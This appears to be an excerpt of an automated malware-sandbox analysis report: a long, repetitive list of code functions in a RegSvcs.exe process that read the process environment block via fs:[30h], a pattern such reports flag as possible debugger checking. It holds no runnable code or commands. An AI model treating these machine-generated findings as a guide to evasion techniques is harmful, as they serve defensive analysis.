Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]	10_2_014A6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]	10_2_014A6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]	10_2_014A6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A430 mov eax, dword ptr fs:[00000030h]	10_2_0145A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014204E5 mov ecx, dword ptr fs:[00000030h]	10_2_014204E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014264AB mov eax, dword ptr fs:[00000030h]	10_2_014264AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014544B0 mov ecx, dword ptr fs:[00000030h]	10_2_014544B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AA4B0 mov eax, dword ptr fs:[00000030h]	10_2_014AA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145674D mov esi, dword ptr fs:[00000030h]	10_2_0145674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145674D mov eax, dword ptr fs:[00000030h]	10_2_0145674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145674D mov eax, dword ptr fs:[00000030h]	10_2_0145674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420750 mov eax, dword ptr fs:[00000030h]	10_2_01420750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462750 mov eax, dword ptr fs:[00000030h]	10_2_01462750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462750 mov eax, dword ptr fs:[00000030h]	10_2_01462750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AE75D mov eax, dword ptr fs:[00000030h]	10_2_014AE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A4755 mov eax, dword ptr fs:[00000030h]	10_2_014A4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428770 mov eax, dword ptr fs:[00000030h]	10_2_01428770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145C700 mov eax, dword ptr fs:[00000030h]	10_2_0145C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420710 mov eax, dword ptr fs:[00000030h]	10_2_01420710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01450710 mov eax, dword ptr fs:[00000030h]	10_2_01450710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145C720 mov eax, dword ptr fs:[00000030h]	10_2_0145C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145C720 mov eax, dword ptr fs:[00000030h]	10_2_0145C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145273C mov eax, dword ptr fs:[00000030h]	10_2_0145273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145273C mov ecx, dword ptr fs:[00000030h]	10_2_0145273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145273C mov eax, dword ptr fs:[00000030h]	10_2_0145273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149C730 mov eax, dword ptr fs:[00000030h]	10_2_0149C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142C7C0 mov eax, dword ptr fs:[00000030h]	10_2_0142C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A07C3 mov eax, dword ptr fs:[00000030h]	10_2_014A07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014427ED mov eax, dword ptr fs:[00000030h]	10_2_014427ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014427ED mov eax, dword ptr fs:[00000030h]	10_2_014427ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014427ED mov eax, dword ptr fs:[00000030h]	10_2_014427ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AE7E1 mov eax, dword ptr fs:[00000030h]	10_2_014AE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014247FB mov eax, dword ptr fs:[00000030h]	10_2_014247FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014247FB mov eax, dword ptr fs:[00000030h]	10_2_014247FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C678E mov eax, dword ptr fs:[00000030h]	10_2_014C678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014207AF mov eax, dword ptr fs:[00000030h]	10_2_014207AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143C640 mov eax, dword ptr fs:[00000030h]	10_2_0143C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E866E mov eax, dword ptr fs:[00000030h]	10_2_014E866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E866E mov eax, dword ptr fs:[00000030h]	10_2_014E866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A660 mov eax, dword ptr fs:[00000030h]	10_2_0145A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A660 mov eax, dword ptr fs:[00000030h]	10_2_0145A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01452674 mov eax, dword ptr fs:[00000030h]	10_2_01452674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E609 mov eax, dword ptr fs:[00000030h]	10_2_0149E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]	10_2_0143260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]	10_2_0143260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]	10_2_0143260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]	10_2_0143260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]	10_2_0143260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]	10_2_0143260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]	10_2_0143260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462619 mov eax, dword ptr fs:[00000030h]	10_2_01462619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E627 mov eax, dword ptr fs:[00000030h]	10_2_0143E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01456620 mov eax, dword ptr fs:[00000030h]	10_2_01456620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01458620 mov eax, dword ptr fs:[00000030h]	10_2_01458620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142262C mov eax, dword ptr fs:[00000030h]	10_2_0142262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A6C7 mov ebx, dword ptr fs:[00000030h]	10_2_0145A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A6C7 mov eax, dword ptr fs:[00000030h]	10_2_0145A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0149E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0149E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0149E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0149E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A06F1 mov eax, dword ptr fs:[00000030h]	10_2_014A06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A06F1 mov eax, dword ptr fs:[00000030h]	10_2_014A06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01424690 mov eax, dword ptr fs:[00000030h]	10_2_01424690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01424690 mov eax, dword ptr fs:[00000030h]	10_2_01424690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145C6A6 mov eax, dword ptr fs:[00000030h]	10_2_0145C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014566B0 mov eax, dword ptr fs:[00000030h]	10_2_014566B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A0946 mov eax, dword ptr fs:[00000030h]	10_2_014A0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01446962 mov eax, dword ptr fs:[00000030h]	10_2_01446962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01446962 mov eax, dword ptr fs:[00000030h]	10_2_01446962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01446962 mov eax, dword ptr fs:[00000030h]	10_2_01446962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0146096E mov eax, dword ptr fs:[00000030h]	10_2_0146096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0146096E mov edx, dword ptr fs:[00000030h]	10_2_0146096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0146096E mov eax, dword ptr fs:[00000030h]	10_2_0146096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C4978 mov eax, dword ptr fs:[00000030h]	10_2_014C4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C4978 mov eax, dword ptr fs:[00000030h]	10_2_014C4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AC97C mov eax, dword ptr fs:[00000030h]	10_2_014AC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E908 mov eax, dword ptr fs:[00000030h]	10_2_0149E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E908 mov eax, dword ptr fs:[00000030h]	10_2_0149E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AC912 mov eax, dword ptr fs:[00000030h]	10_2_014AC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01418918 mov eax, dword ptr fs:[00000030h]	10_2_01418918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01418918 mov eax, dword ptr fs:[00000030h]	10_2_01418918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A892A mov eax, dword ptr fs:[00000030h]	10_2_014A892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B892B mov eax, dword ptr fs:[00000030h]	10_2_014B892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B69C0 mov eax, dword ptr fs:[00000030h]	10_2_014B69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0142A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0142A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0142A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0142A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0142A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0142A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014549D0 mov eax, dword ptr fs:[00000030h]	10_2_014549D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EA9D3 mov eax, dword ptr fs:[00000030h]	10_2_014EA9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AE9E0 mov eax, dword ptr fs:[00000030h]	10_2_014AE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014529F9 mov eax, dword ptr fs:[00000030h]	10_2_014529F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014529F9 mov eax, dword ptr fs:[00000030h]	10_2_014529F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014209AD mov eax, dword ptr fs:[00000030h]	10_2_014209AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014209AD mov eax, dword ptr fs:[00000030h]	10_2_014209AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A89B3 mov esi, dword ptr fs:[00000030h]	10_2_014A89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A89B3 mov eax, dword ptr fs:[00000030h]	10_2_014A89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A89B3 mov eax, dword ptr fs:[00000030h]	10_2_014A89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01432840 mov ecx, dword ptr fs:[00000030h]	10_2_01432840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01450854 mov eax, dword ptr fs:[00000030h]	10_2_01450854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01424859 mov eax, dword ptr fs:[00000030h]	10_2_01424859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01424859 mov eax, dword ptr fs:[00000030h]	10_2_01424859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AE872 mov eax, dword ptr fs:[00000030h]	10_2_014AE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AE872 mov eax, dword ptr fs:[00000030h]	10_2_014AE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B6870 mov eax, dword ptr fs:[00000030h]	10_2_014B6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B6870 mov eax, dword ptr fs:[00000030h]	10_2_014B6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AC810 mov eax, dword ptr fs:[00000030h]	10_2_014AC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]	10_2_01442835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]	10_2_01442835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]	10_2_01442835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01442835 mov ecx, dword ptr fs:[00000030h]	10_2_01442835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]	10_2_01442835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]	10_2_01442835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A830 mov eax, dword ptr fs:[00000030h]	10_2_0145A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C483A mov eax, dword ptr fs:[00000030h]	10_2_014C483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C483A mov eax, dword ptr fs:[00000030h]	10_2_014C483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E8C0 mov eax, dword ptr fs:[00000030h]	10_2_0144E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EA8E4 mov eax, dword ptr fs:[00000030h]	10_2_014EA8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145C8F9 mov eax, dword ptr fs:[00000030h]	10_2_0145C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145C8F9 mov eax, dword ptr fs:[00000030h]	10_2_0145C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420887 mov eax, dword ptr fs:[00000030h]	10_2_01420887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AC89D mov eax, dword ptr fs:[00000030h]	10_2_014AC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B6B40 mov eax, dword ptr fs:[00000030h]	10_2_014B6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B6B40 mov eax, dword ptr fs:[00000030h]	10_2_014B6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EAB40 mov eax, dword ptr fs:[00000030h]	10_2_014EAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C8B42 mov eax, dword ptr fs:[00000030h]	10_2_014C8B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141CB7E mov eax, dword ptr fs:[00000030h]	10_2_0141CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]	10_2_0149EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144EB20 mov eax, dword ptr fs:[00000030h]	10_2_0144EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144EB20 mov eax, dword ptr fs:[00000030h]	10_2_0144EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E8B28 mov eax, dword ptr fs:[00000030h]	10_2_014E8B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E8B28 mov eax, dword ptr fs:[00000030h]	10_2_014E8B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01440BCB mov eax, dword ptr fs:[00000030h]	10_2_01440BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01440BCB mov eax, dword ptr fs:[00000030h]	10_2_01440BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01440BCB mov eax, dword ptr fs:[00000030h]	10_2_01440BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420BCD mov eax, dword ptr fs:[00000030h]	10_2_01420BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420BCD mov eax, dword ptr fs:[00000030h]	10_2_01420BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420BCD mov eax, dword ptr fs:[00000030h]	10_2_01420BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CEBD0 mov eax, dword ptr fs:[00000030h]	10_2_014CEBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428BF0 mov eax, dword ptr fs:[00000030h]	10_2_01428BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428BF0 mov eax, dword ptr fs:[00000030h]	10_2_01428BF0
